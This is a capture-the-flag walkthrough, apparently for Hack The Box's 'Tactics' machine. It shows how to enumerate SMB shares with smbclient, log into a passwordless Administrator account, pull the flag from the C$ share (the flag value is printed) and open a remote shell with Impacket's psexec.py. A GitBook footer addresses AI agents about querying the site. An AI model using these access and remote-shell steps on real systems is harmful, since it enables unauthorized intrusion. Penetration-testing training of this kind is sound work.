> For the complete documentation index, see [llms.txt](https://sgtdiddlywink.gitbook.io/htb/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sgtdiddlywink.gitbook.io/htb/machines/starting-point-machines/tier-1-machines/tactics.md).

# Tactics

{% file src="/files/h68gLeYysDOMBA0ZeLaD" %}

**Task 1: Which Nmap switch can we use to enumerate machines when our ping ICMP packets are blocked by the Windows firewall?**

* The `-Pn` flag will treat all hosts as online and not ping the Target IP Address.

**Task 2: What does the 3-letter acronym SMB stand for?**

* Sever Message Block

**Task 3: What port does SMB use to operate at?**

* 445

**Task 4: What command line argument do you give to `smbclient` to list available shares?**

* Input the command smbclient into the terminal to see the list of options and flags:

<figure><img src="/files/tGmf8C4FDqrGm1EurBaO" alt=""><figcaption></figcaption></figure>

* `-L` will list out the shares.

**Task 5: What character at the end of a share name indicates it's an administrative share?**

* Start by logging into the IP with `sbmclient`

```
smbclient -L [Target IP] -U Administrator
```

* Try logging into the administrator account first as it is the highest privileged account in Microsoft.
* When prompted for a password, just hit enter as it is a passwordless account.
*

```
<figure><img src="/files/otgfPsqxbhWNXuCLc0Tu" alt=""><figcaption></figcaption></figure>
```

* This will display the shares available.
* At the end of each Share is a "$" symbol.

**Task 6: Which Administrative share is accessible on the box that allows users to view the whole file system?**

* Generally speaking the C Drive contains all of the system files in a Windows OS.

**Task 7: What command can we use to download the files we find on the SMB Share?**

* Start by accessing some of the shares. You can do this with the following commands:

```
smbclient \\\\[Target IP]\\[Share Name] -U Administrator
```

* You will be prompted for a password depending on the account. In this case, the Administrator account is passwordless so you can just hit enter.
* You can then type in `help` to see what commands are available.
* ![](/files/IMIhs8wCcX44DkD5FOp2)
* In this case, the answer is `get`. Similar to Linux.

**Task 8: Which tool that is part of the Impacket collection can be used to get an interactive shell on the system?**

* Googling this you can discover that a psexec.py tool is a Python tool part of the IMPACKET Module that allows you to gain a fully interactive shell on a Windows system.&#x20;

**Capture the Flag:**

* Switch to the C$ Share for common directories on the system. You can use the same command from above.
* Once in the C$ Share, redirect to the C$\Users\Administrator\Desktop\ directory to find the flag.
* f751c19eda8f61ce81827e6930a1f40c

**Alternate Means to the Flag with IMPACKET:**

* Start by downloading Impacket to your host machine.

```
git clone https://github.com/SecureAuthCorp/impacket.git
```

* cd into the impacket directory

```
cd impacket
```

* Setup impacket:

```
sudo python3 setup.py install
```

* Check to make sure you have all of the requirements installed:

```
pip3 install -r requirements.txt
```

* Check out the options for psexec.py with the following:

```
psexec.py -h
```

![](/files/3tUO1ZztFdvRGlL7tq5w)

* psexec.py is located in the `/impacket/example/` directory.
* Next is to use the tool to gain an interactive shell with the windows target:

```
python3 psexec.py username:password@[Target IP]
```

* Since the Administrator's account is passwordless, we will just use the following:

```
python3 psexec.py administrator@[Target IP]
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://sgtdiddlywink.gitbook.io/htb/machines/starting-point-machines/tier-1-machines/tactics.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.